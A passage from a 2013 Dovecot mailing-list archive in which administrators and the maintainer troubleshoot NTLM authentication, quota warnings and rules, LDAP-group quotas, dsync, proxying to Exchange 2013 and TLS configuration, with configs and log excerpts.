NTLM in the Thurnderbird MUA I see this: Jun 21 13:15:46 SBSMTPNV05 postfix/smtpd[1506]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libauthdb_ldap.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libdriver_sqlite.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/libmech_gssapi.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=1506) Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011NTLM#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=TlRMT[...snip...]A= Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0111#011TlRMT[[...snip...]A Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0111#011TlRMT[...snip...]A= Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL Jun 21 13:15:48 SBSMTPNV05 postfix/smtpd[1506]: warning: nvit01b.mydomain.com[10.20.2.0]: SASL NTLM authentication failed: TlRMT[...snip...]A Jun 21 13:15:48 SBSMTPNV05 dovecot: auth: Debug: client out: FAIL#0111 Jun 21 13:15:49 SBSMTPNV05 postfix/smtpd[1506]: disconnect from nvit01b.mydomain.com[10.20.2.0] with nothing in the secure log and I don't see anything show up in the winbind logs either. I've reviewed these pages as reference, and I'm not sure what I'm missing: http://wiki2.dovecot.org/HowTo/ActiveDirectoryNtlm http://wiki2.dovecot.org/Authentication/Mechanisms/NTLM http://www.dovecot.org/list/dovecot/2008-December/035630.html http://www.dovecot.org/list/dovecot/2010-February/046763.html http://blog.al-shami.net/2008/05/freebsd-postfix-dovecot-and-active-directory/ http://wiki2.dovecot.org/HowTo/PostfixAndDovecotSASL Here's some of my relevant configuration as I understand it: I've joined the computer to the AD domain. The wbinfo tests work fine: # wbinfo -t checking the trust secret for domain MYDOMAIN via RPC calls succeeded # doveconf -n # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.11.1.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug_passwords = yes auth_mechanisms = plain ntlm login auth_use_winbind = yes auth_username_format = %Lu listen = * mbox_write_locks = fcntl passdb { driver = pam } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } } ssl_cert = References: <87y5a0etua.fsf@gmx.co.uk> <20130623191817.GA23164@mushkin.tanso.net> <87r4fsb2hq.fsf@gmx.co.uk> <51C7C1A9.3060609@nybeta.com> <87d2rbbogn.fsf@gmx.co.uk> Message-ID: <51C87DE5.6020103@nybeta.com> On 6/24/2013 9:58 AM, Johnny wrote: > Yes, /var/log/audit/ with audit.log. There are some archived logs as > well, but no recent messages regarding dovecot perms. Typically you could use "sealert -a /var/log/audit/audit.log /var/log/audit/audit.log.1" to get a feel for how many SELinux exceptions are happening. Also, when you say that the restorecon -R did not fix the issue, did you check the output of "ls -Z" after running it? However, looking at your original message, I'm wondering why the forward slashes are doubled up. For instance: "/home/user/data1/Maildir//" From ben at indietorrent.org Mon Jun 24 20:27:04 2013 From: ben at indietorrent.org (Ben Johnson) Date: Mon, 24 Jun 2013 13:27:04 -0400 Subject: [Dovecot] dovecot-lda - dovecot: quota-warning: Error: lda: Fatal: Unknown argument In-Reply-To: <51C86CF8.4040906@indietorrent.org> References: <51C86CF8.4040906@indietorrent.org> Message-ID: <51C88168.5050205@indietorrent.org> On 6/24/2013 11:59 AM, Ben Johnson wrote: > Hi, everyone, > > I'm attempting to configure automated quota warnings for users and have > hit a snag. > > The script I'm using is as follows: > > > --------------------------------------------------------------------- > #!/bin/sh > PERCENT=$1 > MAILBOX=$2 > DOMAIN=$3 > cat << EOF | /usr/lib/dovecot/dovecot-lda -d $USER -o > "plugin/quota=dict:user::file:/var/vmail/%d/%n/.quotausage" > From: postmaster@$DOMAIN > Subject: Email quota warning - mailbox over $PERCENT% full > [...] > --------------------------------------------------------------------- > > When the script is triggered, here's what appears in the log: > > --------------------------------------------------------------------- > Jun 24 11:16:53 host dovecot: quota-warning: Error: lda: Fatal: Unknown > argument: > plugin/quota=dict:user::noenforcing:file:/var/vmail/%d/%n/.quotausage > Jun 24 11:16:53 host dovecot: master: Error: service(quota-warning): > child 22415 returned error 64 > --------------------------------------------------------------------- > > If I paste the same on the command line, the message is delivered, as > expected: > > /usr/lib/dovecot/dovecot-lda -d user at example.com -o > "plugin/quota=dict:user::noenforcing:file:/var/vmail/%d/%n/.quotausage" > -p /tmp/test.txt > > The problem seems to be that the -o switch isn't being interpreted > correctly when dovecot-lda is called from within the script. -o is the > correct switch, yes? From the manual at http://wiki2.dovecot.org/LDA : > > -o name=value: Override a setting from dovecot.conf. You can give this > parameter multiple times. > > What am I missing here? Is some shell script escaping or similar required? > > Thanks for any tips! > > -Ben > I figured it out; I had copy/pasted part of the line cat << EOF | /usr/lib/dovecot/dovecot-lda -d $USER -o \ "plugin/quota=dict:user::file:/var/vmail/%d/%n/.quotausage" from the documentation example and in so doing I neglected to use the correct variable name for the user/mailbox. In the documentation example, the variable is $USER, whereas I had named it $MAILBOX. This was causing the mailbox/user to be evaluated as an empty string (or null). Everything works as expected using the correct variable name. Oops! -Ben From ben at indietorrent.org Mon Jun 24 21:02:45 2013 From: ben at indietorrent.org (Ben Johnson) Date: Mon, 24 Jun 2013 14:02:45 -0400 Subject: [Dovecot] Warning recipient when message delivery fails due to over-quota Message-ID: <51C889C5.2040902@indietorrent.org> I'm working to configure automated quota notifications in Dovecot and am wondering if it is possible to send a warning message to a user when message delivery fails because the user is over-quota. I already have the following directives configured: quota_warning = storage=95%% quota-warning 95 %u %d quota_warning2 = storage=80%% quota-warning 80 %u %d quota_warning3 = -storage=100%% quota-below below %u %d These seem to function as expected, but the problem I'm facing is that when a message is large enough to take the user's quota from, say, 84% to over 100%, the message is rejected (as expected), but the user is never warned that a message failed to be delivered because it would have put him over 100% usage. I suppose that I'm looking for a trigger that is tripped when delivering the message *would* put the user over-quota (as opposed to *does in fact* put the user over). The sender receives an automated rejection message already. I'm wondering if the recipient can be warned at the same time. (I'm not concerned about further increasing the user's quota consumption with the warning message; I would set noenforcing to 1.) Is this possible? Any help is much appreciated. Thanks in advance. -Ben From ka at pacific.net Mon Jun 24 21:21:57 2013 From: ka at pacific.net (Ken A) Date: Mon, 24 Jun 2013 13:21:57 -0500 Subject: [Dovecot] Warning recipient when message delivery fails due to over-quota In-Reply-To: <51C889C5.2040902@indietorrent.org> References: <51C889C5.2040902@indietorrent.org> Message-ID: <51C88E45.4050409@pacific.net> On 6/24/2013 1:02 PM, Ben Johnson wrote: > I'm working to configure automated quota notifications in Dovecot and am > wondering if it is possible to send a warning message to a user when > message delivery fails because the user is over-quota. > > I already have the following directives configured: > > quota_warning = storage=95%% quota-warning 95 %u %d > quota_warning2 = storage=80%% quota-warning 80 %u %d > quota_warning3 = -storage=100%% quota-below below %u %d > > These seem to function as expected, but the problem I'm facing is that > when a message is large enough to take the user's quota from, say, 84% > to over 100%, the message is rejected (as expected), but the user is > never warned that a message failed to be delivered because it would have > put him over 100% usage. > > I suppose that I'm looking for a trigger that is tripped when delivering > the message *would* put the user over-quota (as opposed to *does in > fact* put the user over). > > The sender receives an automated rejection message already. I'm > wondering if the recipient can be warned at the same time. (I'm not > concerned about further increasing the user's quota consumption with the > warning message; I would set noenforcing to 1.) > > Is this possible? Any help is much appreciated. Thanks in advance. > > -Ben > You can give some additional space = the max message size allowed in your email system, like in the example: http://wiki2.dovecot.org/Quota/Configuration#line-1-5 (change Trash to Inbox). Then the message would be accepted, and the user would get the normal 100% notice. Ken -- Ken Anderson Pacific Internet - http://www.pacific.net From ben at indietorrent.org Mon Jun 24 22:32:34 2013 From: ben at indietorrent.org (Ben Johnson) Date: Mon, 24 Jun 2013 15:32:34 -0400 Subject: [Dovecot] Warning recipient when message delivery fails due to over-quota In-Reply-To: <51C88E45.4050409@pacific.net> References: <51C889C5.2040902@indietorrent.org> <51C88E45.4050409@pacific.net> Message-ID: <51C89ED2.9020406@indietorrent.org> On 6/24/2013 2:21 PM, Ken A wrote: > You can give some additional space = the max message size allowed in > your email system, like in the example: > http://wiki2.dovecot.org/Quota/Configuration#line-1-5 > (change Trash to Inbox). Then the message would be accepted, and the > user would get the normal 100% notice. > > Ken Thank you for the quick reply, Ken. What you describe sounds like it would work for my purposes. (Although, it would be nice to see quota warnings for "would" [instead of "did"] scenarios implemented.) I added quota_rule4 to my plugin {} stanza: plugin { quota_rule2 = Trash:storage=+100M quota_rule3 = Junk:ignore quota_rule4 = Inbox:storage=+100M } I then restarted Dovecot. My test user's quota is at 94% of 3MB before I attempt to send a message with a 206KB attachment. When I send the test message that should, in theory, put my test user over-quota, but well within the additional 100M that quota_rule4 grants, the message is still rejected outright. Here is the debug output that I captured: http://pastebin.com/75byrwC7 In particular, the following line seems to imply that this rule should be effective: dovecot: lda(user at example.com): Debug: Quota rule: root=user mailbox=Inbox bytes=+104857600 messages=0 Any thoughts as to why this might be happening? My "doveconf -n" output: http://pastebin.com/eZcmEWYA Thanks again for your help, -Ben From tss at iki.fi Mon Jun 24 23:00:56 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 23:00:56 +0300 Subject: [Dovecot] Warning recipient when message delivery fails due to over-quota In-Reply-To: <51C89ED2.9020406@indietorrent.org> References: <51C889C5.2040902@indietorrent.org> <51C88E45.4050409@pacific.net> <51C89ED2.9020406@indietorrent.org> Message-ID: On 24.6.2013, at 22.32, Ben Johnson wrote: > plugin { > quota_rule2 = Trash:storage=+100M > quota_rule3 = Junk:ignore > quota_rule4 = Inbox:storage=+100M > } > > When I send the test message that should, in theory, put my test user > over-quota, but well within the additional 100M that quota_rule4 grants, > the message is still rejected outright. Here is the debug output that I > captured: Try if uppercased INBOX works. Also this can better be done with the quota_grace feature in v2.2. From tss at iki.fi Mon Jun 24 23:01:54 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 23:01:54 +0300 Subject: [Dovecot] Quota based on LDAP group In-Reply-To: <7756319.TdIDd1AI5F@gesher> References: <7756319.TdIDd1AI5F@gesher> Message-ID: <2B9480B8-40BC-4AC0-921D-8375FA5F1DC2@iki.fi> On 24.6.2013, at 16.35, Pavel Herrmann wrote: > I have a setup where my dovecot (2.0, if that makes a difference) authenticates > against an LDAP directory. In my scenario, I have two types of users, lets > call them "normal" and "privileged". What I need is for the normal user to > have a fixed quota, but for the priviledged to have none. (The users do not > exist on the underlying system, so I cant do quota based on FS) > > The issue is that my LDAP is actually an AD, and there is a fair amount of new > accounts over the time (in other words, I cannot use LDAP attribute for > storing quota, because the AD tools don't understand it, and I would have to > add it manually for each new account). > > The approach I had in mind is using quota based on user group (I do have > groups representing both normal and priviledged users), but I cannot find a way > to set it up in dovecot. > Am I missing something or does dovecot not support LDAP groups as attribute > source? Sounds like you need to do two LDAP lookups and merge them. That requires Dovecot v2.2. From tss at iki.fi Mon Jun 24 23:18:29 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 23:18:29 +0300 Subject: [Dovecot] Dsync only one mailbox In-Reply-To: <0edab52b77fe20d9131a88d7fd45c02e@nsm.pl> References: <0edab52b77fe20d9131a88d7fd45c02e@nsm.pl> Message-ID: <3AC83203-A207-466D-96AC-B2BF78AA82AA@iki.fi> On 23.6.2013, at 18.29, Piotr Janusz wrote: > I am looking for a way to sync only selected files/mailbox'es using dsync. > Am I using the dsync -m option incorectly? > It looks like it's being ignored. > And as for the main INBOX (/var/mail/username) what should be the parameter for -m? > > dovecot --version > 2.1.7 > > dsync -u pj -D -v -m Alerts -o mail_location=mdbox:/home/pj/mdbox backup mbox:/home/pj/:INBOX=/var/mail/pj .. > dsync(pj): Error: Failed to sync mailbox www/IMG_20121119_184255.jpg: Mailbox isn't a valid mbox file > dsync(pj): Error: Failed to sync mailbox www/rtranalizer.exe: Mailbox isn't a valid mbox file > dsync(pj): Error: Failed to sync mailbox www/raport_nsm.rar: Mailbox isn't a valid mbox file dsync always wants to scan through all the mailboxes that exist, even though you give the -m parameter. I don't think it's actually failing even though it's returning an error. The proper solution anyway would be to place the backup to a directory that doesn't contain other files.. From tss at iki.fi Mon Jun 24 23:21:28 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 23:21:28 +0300 Subject: [Dovecot] doveadm move command In-Reply-To: References: Message-ID: <26FE61B7-6123-4512-92CF-A269B13AD68D@iki.fi> On 21.6.2013, at 17.50, vincent truc wrote: > I want to transfer an email from user1 at domain.com to put it in a folder of another user: user2 at domain.com > > For that, it seems to me appropriate to use 'doveadm move' command, but I can not get the right result. Can you help me? > > syntax: > doveadm move [-u |-A] [-S ] [user ] > > > my attempts: > > doveadm move -u user2 at domain.com DIRECTORY_2 mailbox user1 at domain.com:'DIRECTORY_1' all doveadm move -u user2 at domain.com DIRECTORY_2 user user1 at domain.com mailbox DIRECTORY_1 From tss at iki.fi Mon Jun 24 23:23:38 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 23:23:38 +0300 Subject: [Dovecot] mail_max_userip_connections on a per user basis In-Reply-To: References: Message-ID: <46D6ABCE-7F16-4534-9D70-28284E66DF71@iki.fi> On 20.6.2013, at 2.24, Antonio Leding wrote: > Can the above setting be applied on a per user account basis? > > I thought that maybe something like per account quotas might be a possible method but not sure. Nope. Although there's a mail_ prefix, the setting is actually handled by login processes. You can have different values for different protocols (imap, pop3) but not for different users. You could have them for different source/destination IPs/networks though (local {}, remote {} blocks). From tss at iki.fi Mon Jun 24 23:40:57 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 23:40:57 +0300 Subject: [Dovecot] Dovecot proxy to Microsoft Exchange 2013 In-Reply-To: <51C1F046.9090607@gmail.com> References: <51C1F046.9090607@gmail.com> Message-ID: <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> On 19.6.2013, at 20.54, Ricardo Machini Barbosa wrote: > I am trying to do a proxy with dovecot to IMAP backend server that are using Microsoft Exchange 2013. > I already did this with Microsoft Exchange 2007 and Microsoft Exchange 2010 and it works perfectly! But with Microsoft Exchange 2013 I can not perform LOGIN. > > The error log message is: > /imap-login: Error: proxy(user at domain.com.br): Login for exchange2013.domain.com.br:143 timed out in state=4 (after 30 secs, local=x.x.x.x:59640)/ > > My troubleshoot was: > > - tcpdump on dovecot server side: > I can see the commands sent/received by Microsoft Exchange. But no the "OK LOGIN" response. > > /* OK The Microsoft Exchange IMAP4 service in xxxx is ready.// > //C CAPABILITY// > //L LOGIN "user at domain.com.br" "123456"// > //* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN STARTTLS UIDPLUS CHILDREN IDLE NAMESPACE LITERAL+// > //C OK CAPABILITY completed./ Looks like Exchange 2013 IMAP has broken command pipelining :( See if it gets fixed by http://hg.dovecot.org/dovecot-2.2/rev/6e8bbc150fa9 and the attached patch on top of that? If it works, I'll commit that patch too. -------------- next part -------------- A non-text attachment was scrubbed... Name: diff Type: application/octet-stream Size: 2387 bytes Desc: not available URL: -------------- next part -------------- From tss at iki.fi Mon Jun 24 23:53:36 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 23:53:36 +0300 Subject: [Dovecot] auth probes without IP - "Initial status notification not received ..." In-Reply-To: <20130617080017.GA13445@daniell-kurt.KURTHQ.local> References: <20130617080017.GA13445@daniell-kurt.KURTHQ.local> Message-ID: On 17.6.2013, at 11.00, LEVAI Daniel wrote: > I've been getting a bunch of these messages lately in my logs: > > dovecot: master: Error: service(auth): Initial status notification not received in 30 seconds, killing the process > dovecot: auth: Fatal: master: service(auth): child 11016 killed with signal 9 > dovecot: master: Error: service(auth): Initial status notification not received in 30 seconds, killing the process > dovecot: auth: Fatal: master: service(auth): child 27660 killed with signal 9 > > # fgrep -c -e "master: Error: service(auth): Initial status" dovecot.log* > [...] > dovecot.log.1:501 > dovecot.log.2:250 > [...] > > But I can not link these auth probes to any IP addresses within the > dovecot log files. This is dovecot-2.2.2 on OpenBSD-stable. It looks like the auth processes are actually hanging at startup. Normally they'll finish send the notification immediately after they start up, but for some reason that's not happening here.. Or alternatively something else very weird is going on. Does Dovecot usually work? Maybe the status signalation via pipes isn't working correctly. Then I'd think it would be logging it for all processes, not just auth processes. From ben at indietorrent.org Mon Jun 24 23:54:05 2013 From: ben at indietorrent.org (Ben Johnson) Date: Mon, 24 Jun 2013 16:54:05 -0400 Subject: [Dovecot] Warning recipient when message delivery fails due to over-quota In-Reply-To: References: <51C889C5.2040902@indietorrent.org> <51C88E45.4050409@pacific.net> <51C89ED2.9020406@indietorrent.org> Message-ID: <51C8B1ED.8030501@indietorrent.org> On 6/24/2013 4:00 PM, Timo Sirainen wrote: > On 24.6.2013, at 22.32, Ben Johnson wrote: > >> plugin { >> quota_rule2 = Trash:storage=+100M >> quota_rule3 = Junk:ignore >> quota_rule4 = Inbox:storage=+100M >> } >> >> When I send the test message that should, in theory, put my test user >> over-quota, but well within the additional 100M that quota_rule4 grants, >> the message is still rejected outright. Here is the debug output that I >> captured: > > Try if uppercased INBOX works. Also this can better be done with the quota_grace feature in v2.2. > That was it! Thank you, Timo! I will look into the quota_grace feature in 2.2; that sounds like exactly what I want. Your time and generosity are deeply appreciated. -Ben From yann.shukor at azurtem.net Mon Jun 24 23:54:40 2013 From: yann.shukor at azurtem.net (Yann Shukor) Date: Mon, 24 Jun 2013 22:54:40 +0200 Subject: [Dovecot] chown Message-ID: <51C8B210.4010707@azurtem.net> Hi I currently have to execute the following command everytime I restart Dovecot : chown dovenull:vmail /var/run/dovecot/login What should I change in my config files to avoidhaving to do this ? thanks yann ========= Dovecot -n: ========= # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-4-686-pae i686 Debian 7.0 ext4 auth_debug = yes auth_mechanisms = plain login auth_socket_path = /var/run/dovecot/auth-userdb auth_verbose = yes disable_plaintext_auth = no first_valid_gid = 5000 first_valid_uid = 5000 hostname = holimail.holinice.com last_valid_gid = 5000 last_valid_uid = 5000 listen = * mail_debug = yes mail_gid = vmail mail_location = maildir:/var/vmail/%d/%n/Maildir mail_privileged_group = mail mail_uid = vmail managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace inbox { inbox = yes location = maildir:/var/vmail/%d/%n/Maildir mailbox Brouillons { special_use = \Drafts } mailbox "Courrier indesirable" { special_use = \Junk } mailbox "Elements envoyes" { special_use = \Sent } mailbox "Elements supprimes" { special_use = \Trash } prefix = subscriptions = yes } passdb { args = scheme=CRAM-MD5 /etc/dovecot/users.conf driver = passwd-file } passdb { driver = pam } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } postmaster_address = azurtem at holinice.com protocols = " imap sieve pop3" service auth-worker { user = $default_internal_user } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } unix_listener auth-userdb { group = vmail mode = 0600 user = vmail } } service imap-login { group = dovecot inet_listener imap { port = 143 } inet_listener imaps { port = 993 ssl = yes } } service imap { process_limit = 1024 } service pop3-login { inet_listener pop3 { port = 110 } inet_listener pop3s { port = 995 ssl = yes } } service pop3 { process_limit = 1024 } ssl_cert = References: <20130617080017.GA13445@daniell-kurt.KURTHQ.local> Message-ID: <20130624210134.GA14205@serenity> On h, j?n 24, 2013 at 23:53:36 +0300, Timo Sirainen wrote: > On 17.6.2013, at 11.00, LEVAI Daniel wrote: > > > I've been getting a bunch of these messages lately in my logs: > > > > dovecot: master: Error: service(auth): Initial status notification not received in 30 seconds, killing the process > > dovecot: auth: Fatal: master: service(auth): child 11016 killed with signal 9 > > dovecot: master: Error: service(auth): Initial status notification not received in 30 seconds, killing the process > > dovecot: auth: Fatal: master: service(auth): child 27660 killed with signal 9 > > > > # fgrep -c -e "master: Error: service(auth): Initial status" dovecot.log* > > [...] > > dovecot.log.1:501 > > dovecot.log.2:250 > > [...] > > > > But I can not link these auth probes to any IP addresses within the > > dovecot log files. This is dovecot-2.2.2 on OpenBSD-stable. > > It looks like the auth processes are actually hanging at startup. > Normally they'll finish send the notification immediately after they > start up, but for some reason that's not happening here.. Or > alternatively something else very weird is going on. Okay :)) > Does Dovecot usually work? Maybe the status signalation via pipes > isn't working correctly. Then I'd think it would be logging it for all > processes, not just auth processes. Dovecot always works. Really. It is not a big setup, just a bunch of addresses with maildirs, and not too needy end-users :) As I did not get any inquiries about login errors, I didn't even notice these until the semi-regular error log inspections. And to be honest, there were no recurrences since those two days (logs are daily rotated). Thanks for the feedback :) Daniel -- L?VAI D?niel PGP key ID = 0x83B63A8F Key fingerprint = DBEC C66B A47A DFA2 792D 650C C69B BE4C 83B6 3A8F From morpheus.ibis at gmail.com Tue Jun 25 00:05:38 2013 From: morpheus.ibis at gmail.com (Pavel Herrmann) Date: Mon, 24 Jun 2013 23:05:38 +0200 Subject: [Dovecot] Quota based on LDAP group In-Reply-To: <2B9480B8-40BC-4AC0-921D-8375FA5F1DC2@iki.fi> References: <7756319.TdIDd1AI5F@gesher> <2B9480B8-40BC-4AC0-921D-8375FA5F1DC2@iki.fi> Message-ID: <2137039.J19otqhh5Z@bloomfield> On Monday 24 of June 2013 23:01:54 Timo Sirainen wrote: > On 24.6.2013, at 16.35, Pavel Herrmann wrote: > > I have a setup where my dovecot (2.0, if that makes a difference) > > authenticates against an LDAP directory. In my scenario, I have two types > > of users, lets call them "normal" and "privileged". What I need is for > > the normal user to have a fixed quota, but for the priviledged to have > > none. (The users do not exist on the underlying system, so I cant do > > quota based on FS) > > > > The issue is that my LDAP is actually an AD, and there is a fair amount of > > new accounts over the time (in other words, I cannot use LDAP attribute > > for storing quota, because the AD tools don't understand it, and I would > > have to add it manually for each new account). > > > > The approach I had in mind is using quota based on user group (I do have > > groups representing both normal and priviledged users), but I cannot find > > a way to set it up in dovecot. > > Am I missing something or does dovecot not support LDAP groups as > > attribute > > source? > > Sounds like you need to do two LDAP lookups and merge them. That requires > Dovecot v2.2. Sure, I am open to upgrading, if it solves the issue. I would actually need more than 2 requests, as AD supports recursive groups (a group being member of another group), which I do use. One possible issue is that from what I can see on the wiki does not really work with how groups in LDAP usually work. What I would need is the opposite direction - locate a group that has "member=myUserDn" attribute, look whether it has quota attribute set, if not use the group DN as myUserDn and repeat the search. Granted, AD has a backlink "memberOf" attribute, but I am still left with recursively looking up whether the group has a quota attribute, and whether it is a member of another group (cyclic membership is not possible AFAIK). Is this possible with Dovecot 2.2? thanks Pavel Herrmann From tss at iki.fi Tue Jun 25 00:13:05 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 25 Jun 2013 00:13:05 +0300 Subject: [Dovecot] Quota based on LDAP group In-Reply-To: <2137039.J19otqhh5Z@bloomfield> References: <7756319.TdIDd1AI5F@gesher> <2B9480B8-40BC-4AC0-921D-8375FA5F1DC2@iki.fi> <2137039.J19otqhh5Z@bloomfield> Message-ID: <4A99048E-EC4E-49F2-BD44-2ACAE95234F7@iki.fi> On 25.6.2013, at 0.05, Pavel Herrmann wrote: >> Sounds like you need to do two LDAP lookups and merge them. That requires >> Dovecot v2.2. > > Sure, I am open to upgrading, if it solves the issue. > > I would actually need more than 2 requests, as AD supports recursive groups (a > group being member of another group), which I do use. > > One possible issue is that from what I can see on the wiki does not really > work with how groups in LDAP usually work. What I would need is the opposite > direction - locate a group that has "member=myUserDn" attribute, look whether > it has quota attribute set, if not use the group DN as myUserDn and repeat the > search. > Granted, AD has a backlink "memberOf" attribute, but I am still left with > recursively looking up whether the group has a quota attribute, and whether it > is a member of another group (cyclic membership is not possible AFAIK). Is > this possible with Dovecot 2.2? http://wiki2.dovecot.org/AuthDatabase/LDAP/Userdb -> "Subqueries and pointers" does what you need I think. My head can't really follow LDAP stuff well enough to say for sure. From tss at iki.fi Tue Jun 25 00:14:59 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 25 Jun 2013 00:14:59 +0300 Subject: [Dovecot] chown In-Reply-To: <51C8B210.4010707@azurtem.net> References: <51C8B210.4010707@azurtem.net> Message-ID: On 24.6.2013, at 23.54, Yann Shukor wrote: > I currently have to execute the following command everytime I restart Dovecot : > > chown dovenull:vmail /var/run/dovecot/login > > What should I change in my config files to avoidhaving to do this ? What is the error message if you don't do that? From morpheus.ibis at gmail.com Tue Jun 25 00:23:01 2013 From: morpheus.ibis at gmail.com (Pavel Herrmann) Date: Mon, 24 Jun 2013 23:23:01 +0200 Subject: [Dovecot] Quota based on LDAP group In-Reply-To: <4A99048E-EC4E-49F2-BD44-2ACAE95234F7@iki.fi> References: <7756319.TdIDd1AI5F@gesher> <2137039.J19otqhh5Z@bloomfield> <4A99048E-EC4E-49F2-BD44-2ACAE95234F7@iki.fi> Message-ID: <12957457.vcfNqX2Fr2@bloomfield> Hi On Tuesday 25 of June 2013 00:13:05 Timo Sirainen wrote: > On 25.6.2013, at 0.05, Pavel Herrmann wrote: > >> Sounds like you need to do two LDAP lookups and merge them. That requires > >> Dovecot v2.2. > > > > Sure, I am open to upgrading, if it solves the issue. > > > > I would actually need more than 2 requests, as AD supports recursive > > groups (a group being member of another group), which I do use. > > > > One possible issue is that from what I can see on the wiki does not really > > work with how groups in LDAP usually work. What I would need is the > > opposite direction - locate a group that has "member=myUserDn" attribute, > > look whether it has quota attribute set, if not use the group DN as > > myUserDn and repeat the search. > > Granted, AD has a backlink "memberOf" attribute, but I am still left with > > recursively looking up whether the group has a quota attribute, and > > whether it is a member of another group (cyclic membership is not > > possible AFAIK). Is this possible with Dovecot 2.2? > > http://wiki2.dovecot.org/AuthDatabase/LDAP/Userdb -> "Subqueries and > pointers" does what you need I think. My head can't really follow LDAP > stuff well enough to say for sure. Yeah, I figured that one out. the thing I dont see is how I set this up to work recursively (until the quota attribute is found). What I need is something similar to postfix "special_result_attribute" and "leaf_result_attribute" options (with the exception that I need to select one/closest of the attributes found, whereas postfix gets them all) thanks Pavel Herrmann From tss at iki.fi Tue Jun 25 01:22:01 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 25 Jun 2013 01:22:01 +0300 Subject: [Dovecot] Dovecot proxy to Microsoft Exchange 2013 In-Reply-To: <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> References: <51C1F046.9090607@gmail.com> <5905F081-4105-4E17-A868-8B11B31BA550@iki.fi> Message-ID: <1372112521.31839.0.camel@hurina> On Mon, 2013-06-24 at 23:40 +0300, Timo Sirainen wrote: > Looks like Exchange 2013 IMAP has broken command pipelining :( See if it gets fixed by http://hg.dovecot.org/dovecot-2.2/rev/6e8bbc150fa9 and the attached patch on top of that? If it works, I'll commit that patch too. Attached another patch that doesn't crash on successful logins :) -------------- next part -------------- A non-text attachment was scrubbed... Name: diff Type: text/x-patch Size: 2918 bytes Desc: not available URL: From tss at iki.fi Tue Jun 25 02:56:23 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 25 Jun 2013 02:56:23 +0300 Subject: [Dovecot] v2.2.4 released Message-ID: <1372118183.31839.2.camel@hurina> http://dovecot.org/releases/2.2/dovecot-2.2.4.tar.gz http://dovecot.org/releases/2.2/dovecot-2.2.4.tar.gz.sig OK, this should be a pretty good and stable version. + doveadm: Added "flags" command to modify message flags. + doveadm: Added "deduplicate" command to expunge message duplicates. + dsync: Show the state in process title with verbose_proctitle=yes. - imap/pop3 proxy: Master user logins were broken in v2.2.3 - sdbox/mdbox: A corrupted index header with wrong size was never automatically fixed in v2.2.3. - mbox: Fixed assert-crashes related to locking. From phillip.odam at nitorgroup.com Tue Jun 25 03:46:40 2013 From: phillip.odam at nitorgroup.com (Phillip Odam) Date: Mon, 24 Jun 2013 20:46:40 -0400 Subject: [Dovecot] Configuring TLS 1.2 Message-ID: <51C8E870.7090201@nitorgroup.com> Hi I'm running dovecot 2.1.6 and am trying to configure it to require TLS 1.2. So far I've only got as far as getting TLS 1.0 going. In the config file /etc/dovecot/conf.d/10-ssl.conf, I've tried setting ssl_protocols to values like TLSv1.2:!TLSv1:!SSL3 but without any success. Attempts to google this matter turns up results for dovecot v1.2 as opposed to configuring TLS 1.2 in dovecot And having a look over the mailing list archive hasn't turned anything up thus far. Any pointers would be greatly appreciated. Thanks Phillip From h.reindl at thelounge.net Tue Jun 25 03:51:02 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Tue, 25 Jun 2013 02:51:02 +0200 Subject: [Dovecot] Configuring TLS 1.2 In-Reply-To: <51C8E870.7090201@nitorgroup.com> References: <51C8E870.7090201@nitorgroup.com> Message-ID: <51C8E976.9090907@thelounge.net> Am 25.06.2013 02:46, schrieb Phillip Odam: > I'm running dovecot 2.1.6 and am trying to configure it to require TLS 1.2. So far I've only got as far as getting > TLS 1.0 going what operating system? what openssl version? openssl-1.0.1 supports TLS 1.2 openssl-1.0.0 does not so this is not a matter of dovecot, you can see this in maillogs compared between Fedora 17 and 18 while only F18 shows TLS 1.2 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From ricardomachini at gmail.com Tue Jun 25 07:23:52 2013 From: ricardomachini at gmail.com (Ricardo Machini Barbosa) Date: Tue, 25 Jun 2013 01:23:52 